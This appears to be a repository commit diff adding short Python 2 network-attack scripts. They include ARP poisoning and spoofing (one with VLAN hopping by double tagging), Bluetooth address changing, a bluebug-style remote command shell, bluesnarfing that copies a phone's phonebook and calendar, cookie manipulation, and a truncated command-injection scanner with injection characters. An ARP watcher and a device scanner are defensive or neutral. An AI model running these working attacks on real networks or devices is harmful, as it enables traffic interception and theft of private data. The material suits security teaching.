GAP-dev
diff --git a/‎arp-poison.py‎
Lines changed: 29 additions & 0 deletions b/‎arp-poison.py‎
Lines changed: 29 additions & 0 deletions
diff --git a/‎arp-spoof-vlan-hop.py‎
Lines changed: 23 additions & 0 deletions b/‎arp-spoof-vlan-hop.py‎
Lines changed: 23 additions & 0 deletions
diff --git a/‎arp-spoof.py‎
Lines changed: 23 additions & 0 deletions b/‎arp-spoof.py‎
Lines changed: 23 additions & 0 deletions
diff --git a/‎arp-watcher.py‎
Lines changed: 68 additions & 0 deletions b/‎arp-watcher.py‎
Lines changed: 68 additions & 0 deletions
diff --git a/‎bdaddr.py‎
Lines changed: 41 additions & 0 deletions b/‎bdaddr.py‎
Lines changed: 41 additions & 0 deletions
diff --git a/‎bluebug.py‎
Lines changed: 25 additions & 0 deletions b/‎bluebug.py‎
Lines changed: 25 additions & 0 deletions
diff --git a/‎bluesnarf.py‎
Lines changed: 28 additions & 0 deletions b/‎bluesnarf.py‎
Lines changed: 28 additions & 0 deletions
diff --git a/‎bluetooth-scanner.py‎
Lines changed: 6 additions & 0 deletions b/‎bluetooth-scanner.py‎
Lines changed: 6 additions & 0 deletions
diff --git a/‎command-injection.py‎
Lines changed: 24 additions & 0 deletions b/‎command-injection.py‎
Lines changed: 24 additions & 0 deletions
diff --git a/‎cookie-manipulator.py‎
Lines changed: 15 additions & 0 deletions b/‎cookie-manipulator.py‎
Lines changed: 15 additions & 0 deletions
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+
+import sys
+from scapy.all import sniff, sendp, ARP, Ether
+
+
+if len(sys.argv) < 2:
+    print sys.argv[0] + " <iface>"
+    sys.exit(0)
+
+
+def arp_poison_callback(packet):
+    # Got ARP request?
+    if packet[ARP].op == 1:
+        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
+        answer[ARP].op = "is-at"
+        answer[ARP].hwdst = packet[ARP].hwsrc
+        answer[ARP].psrc = packet[ARP].pdst
+        answer[ARP].pdst = packet[ARP].psrc
+
+        print "Fooling " + packet[ARP].psrc + " that " + \
+              packet[ARP].pdst + " is me"
+
+        sendp(answer, iface=sys.argv[1])
+
+sniff(prn=arp_poison_callback,
+      filter="arp",
+      iface=sys.argv[1],
+      store=0)
@@ -0,0 +1,23 @@
+#!/usr/bin/python
+
+import time
+from scapy.all import sendp, ARP, Ether, Dot1Q
+
+iface = "eth0"
+target_ip = '192.168.13.23'
+fake_ip = '192.168.13.5'
+fake_mac = 'c0:d3:de:ad:be:ef'
+our_vlan = 1
+target_vlan = 2
+
+packet = Ether() / \
+         Dot1Q(vlan=our_vlan) / \
+         Dot1Q(vlan=target_vlan) / \
+         ARP(hwsrc=fake_mac,
+             pdst=target_ip,
+             psrc=fake_ip,
+             op="is-at")
+
+while True:
+    sendp(packet, iface=iface)
+    time.sleep(10)
@@ -0,0 +1,23 @@
+#!/usr/bin/python
+
+import sys
+import time
+from scapy.all import sendp, ARP, Ether
+
+if len(sys.argv) < 3:
+    print sys.argv[0] + ": <target> <spoof_ip>"
+    sys.exit(1)
+
+iface = "eth0"
+target_ip = sys.argv[1]
+fake_ip = sys.argv[2]
+
+ethernet = Ether()
+arp = ARP(pdst=target_ip,
+	  psrc=fake_ip,
+	  op="is-at")
+packet = ethernet / arp
+
+while True:
+    sendp(packet, iface=iface)
+    time.sleep(10)
@@ -0,0 +1,68 @@
+#!/usr/bin/python
+
+from scapy.all import sniff, ARP
+from signal import signal, SIGINT
+import sys
+
+arp_watcher_db_file = "/var/cache/arp-watcher.db"
+ip_mac = {}
+
+# Save ARP table on shutdown
+def sig_int_handler(signum, frame):
+    print "Got SIGINT. Saving ARP database..."
+    try:
+        f = open(arp_watcher_db_file, "w")
+
+        for (ip, mac) in ip_mac.items():
+            f.write(ip + " " + mac + "\n")
+
+        f.close()
+        print "Done."
+    except IOError:
+        print "Cannot write file " + arp_watcher_db_file
+        sys.exit(1)
+
+
+def watch_arp(pkt):
+    # got is-at pkt (ARP response)
+    if pkt[ARP].op == 2:
+        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
+
+        # Device is new. Remember it.
+        if ip_mac.get(pkt[ARP].psrc) == None:
+            print "Found new device " + \
+                   pkt[ARP].hwsrc + " " + \
+                   pkt[ARP].psrc
+            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
+
+        # Device is known but has a different IP
+        elif ip_mac.get(pkt[ARP].psrc) and \
+             ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
+                print pkt[ARP].hwsrc + \
+                      " has got new ip " + \
+                      pkt[ARP].psrc + \
+                      " (old " + ip_mac[pkt[ARP].psrc] + ")"
+                ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
+
+
+signal(SIGINT, sig_int_handler)
+
+if len(sys.argv) < 2:
+    print sys.argv[0] + " <iface>"
+    sys.exit(0)
+
+try:
+    fh = open(arp_watcher_db_file, "r")
+except IOError:
+    print "Cannot read file " + arp_watcher_db_file
+    sys.exit(1)
+
+for line in fh:
+    line.chomp()
+    (ip, mac) = line.split(" ")
+    ip_mac[ip] = mac
+
+sniff(prn=watch_arp,
+      filter="arp",
+      iface=sys.argv[1],
+      store=0)
@@ -0,0 +1,41 @@
+#!/usr/bin/python
+
+import sys
+import struct
+import bluetooth._bluetooth as bt
+
+if len(sys.argv) < 2:
+    print sys.argv[0] + " <bdaddr>"
+    sys.exit(1)
+
+# Split bluetooth address into it's bytes
+baddr = sys.argv[1].split(":")
+
+# Open hci socket
+sock = bt.hci_open_dev(0)
+
+# CSR vendor command to change address
+cmd = [ "\xc2", "\x02", "\x00", "\x0c", "\x00", "\x11",
+        "\x47", "\x03", "\x70", "\x00", "\x00", "\x01",
+        "\x00", "\x04", "\x00", "\x00", "\x00", "\x00",
+        "\x00", "\x00", "\x00", "\x00", "\x00", "\x00",
+        "\x00" ]
+
+# Set new addr in hex
+cmd[17] = baddr[3].decode("hex")
+cmd[19] = baddr[5].decode("hex")
+cmd[20] = baddr[4].decode("hex")
+cmd[21] = baddr[2].decode("hex")
+cmd[23] = baddr[1].decode("hex")
+cmd[24] = baddr[0].decode("hex")
+
+# Send HCI request
+bt.hci_send_req(sock,
+                bt.OGF_VENDOR_CMD,
+                0,
+                bt.EVT_VENDOR,
+                2000,
+                "".join(cmd))
+
+sock.close()
+print "Dont forget to reset your device"
@@ -0,0 +1,25 @@
+#!/usr/bin/python
+
+import sys
+import lightblue
+
+if len(sys.argv) < 2:
+    print sys.argv[0] + " <btaddr> <channel>"
+    sys.exit(0)
+
+btaddr = sys.argv[1]
+channel = int(sys.argv[2]) or 17
+running = True
+
+sock = lightblue.socket()
+sock.connect((sys.argv[1], channel))
+
+while running:
+    cmd = raw_input(">>> ")
+
+    if cmd == "quit" or cmd == "exit":
+        running = False
+    else:
+        sock.send(cmd)
+
+sock.close()
@@ -0,0 +1,28 @@
+#!/usr/bin/python
+
+import sys
+from os.path import basename
+from lightblue.obex import OBEXClient
+
+
+if len(sys.argv) < 3:
+    print sys.argv[0] + ": <btaddr> <channel>"
+    sys.exit(0)
+
+btaddr = sys.argv[1]
+channel = int(sys.argv[2])
+
+print "Bluesnarfing %s on channel %d" % (btaddr, channel)
+
+obex = OBEXClient(btaddr, channel)
+obex.connect()
+
+fh = file("calendar.vcs", "w+")
+obex.get({"name": "telecom/cal.vcs"}, fh)
+fh.close()
+
+fh = file("phonebook.vcf", "w+")
+obex.get({"name": "telecom/pb.vcf"}, fh)
+fh.close()
+
+obex.disconnect()
@@ -0,0 +1,6 @@
+#!/usr/bin/python
+
+import lightblue
+
+for device in lightblue.finddevices():
+    print device[0] + " " + device[1]
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+
+###[ Loading modules
+
+import sys
+import httplib2
+from urlparse import urlparse
+from BeautifulSoup import BeautifulSoup
+
+
+###[ Global vars
+
+max_urls = 999
+inject_chars = ["|",
+                "&&",
+                ";",
+                '`']
+error_msgs = [
+    "syntax error",
+    "command not found",
+    "permission denied",
+]
+
+# ...
@@ -0,0 +1,15 @@
+#!/usr/bin/python
+
+import sys
+import httplib2
+
+if len(sys.argv) < 3:
+    print sys.argv[0] + ": &lt;url&gt; <key> <value>"
+    sys.exit(1)
+
+webclient = httplib2.Http()
+headers = {'Cookie': sys.argv[2] + '=' + sys.argv[3]}
+response, content = webclient.request(sys.argv[1],
+                                      'GET',
+                                      headers=headers)
+print content